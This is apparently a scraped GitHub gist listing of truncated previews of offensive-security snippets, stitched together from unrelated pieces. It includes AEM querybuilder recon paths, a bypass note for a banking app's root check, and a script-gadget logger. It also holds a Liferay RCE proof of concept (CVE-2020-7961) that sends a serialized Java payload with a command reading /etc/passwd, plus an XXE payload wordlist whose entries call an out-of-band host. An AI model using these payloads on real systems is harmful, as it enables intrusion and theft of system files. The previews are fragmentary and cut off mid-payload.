sudo apt install zsh-autosuggestions zsh-syntax-highlighting zsh
arthusu
n1snt
/ Oh my ZSH with zsh-autosuggestions zsh-syntax-highlighting zsh-fast-syntax-highlighting and zsh-autocomplete.md
Last active
September 25, 2025 02:09
Oh my ZSH with zsh-autosuggestions zsh-syntax-highlighting zsh-fast-syntax-highlighting and zsh-autocomplete.md
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix= | |
| /security/.5..json?debug=layout | |
| /online/.-1..json | |
| /bin/querybuilder.json.css?path=/home/&p.limit=8 | |
| /bin/querybuilder.json?path=/libs/ | |
| /bin/querybuilder.json?path=/content | |
| /bin/querybuilder.json?path=/content/test/test/en_nz/security/ | |
| /bin/querybuilder.json?path=/crx/&p.hits=full&p.limit=50 | |
| /bin/querybuilder.json?path=/home&p.hits=full&p.limit=-1 | |
| /bin/querybuilder.json?fulltext=admin&p.limit=30 |
lanmaster53
/ whey-cewler.py
Last active
November 26, 2024 08:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Based on the initial work of Digininja at https://github.com/digininja/CeWL. While CeWL is a script written | |
| in Ruby that requires an independent crawl of a website in order to build a custom wordlist, Whey CeWLer | |
| runs within Portswigger's Burp Suite and parses an already crawled sitemap to build a custom wordlist. It | |
| does not have the meta data parsing capabilities that CeWL does, but it more than makes up for it in | |
| convenience. | |
| The name gets its origins from the CeWLer portion of the CO2 Burp extension by Jason Gillam, which is written | |
| in Java and does something similar, but Whey CeWLer is a completely reimagined extension written in Python, | |
| making it "way cooler". |
agnostic-apollo
/ hasFragileUserData.md
Last active
June 20, 2025 05:44
Android hasFragileUserData AndroidManifest.xml flag
The hasFragileUserData flag can be added to the application node of AndroidManifest.xml. If its value is true, then when the user uninstalls the app, a prompt will be shown to the user asking him whether to keep the app's data.
<application
...
android:hasFragileUserData="true" tools:targetApi="q">
...
</application>
bryanjhv
/ remove-yape-root-check.md
Last active
November 11, 2024 15:09
Eliminar chequeo de ROOT de Yape BCP (Android)
- NO trabajo para BCP en este momento ni previo a esta fecha.
- NO me hago responsable por lo que otros hagan con este script.
- NO brindo ningún tipo de soporte, si quieres usarlo lee tutoriales.
- SOLO para uso personal, NO hacerlo comercial. EVITAR piratear.
- SI lo RE-POSTEAS, hazlo agregando un enlace a este ORIGINAL.
- ESPERO que BCP mejore su APP en vez de chequeos TONTOS.
fransr
/ logger.js
Last active
July 17, 2025 13:47
logger.js for hunting script gadgets. More info about script gadgets: https://github.com/google/security-research-pocs/tree/master/script-gadgets (Sebastian Lekies / Eduardo Vela Nava / Krzysztof Kotowicz)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var logger = console.trace; | |
| // ELEMENT | |
| ;(getElementByIdCopy => { | |
| Element.prototype.getElementById = function(q) { | |
| logger('getElementById', q, this, this.innerHTML); | |
| return Reflect.apply(getElementByIdCopy, this, [q]) | |
| } | |
| })(Element.prototype.getElementById) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import httplib | |
| import urllib | |
| http = httplib.HTTPSConnection('example.com', 443) | |
| cookie = 'your=cookies'; | |
| http.request("GET", "/api/v1/csrf", "", { | |
| 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36', | |
| 'referer': 'https://example.com/', |
pikpikcu
/ LiferayRCE(CVE-2020-7961).md
Last active
September 9, 2022 03:46
POC Liferay RCE(CVE-2020-7961)
POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close
cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F63
honoki
/ xxe-payloads.txt
Last active
July 29, 2025 07:13
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
0x240x23elu
/ sqli2.yaml
Last active
December 12, 2023 02:14
Basic SQL Injection Detections nuclei Template
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: SQLInjection_ERROR | |
| info: | |
| name: SQLINJECTION Detection | |
| author: 0x240x23elu & OFJAAAH | |
| severity: High | |
| requests: | |
| - method: GET |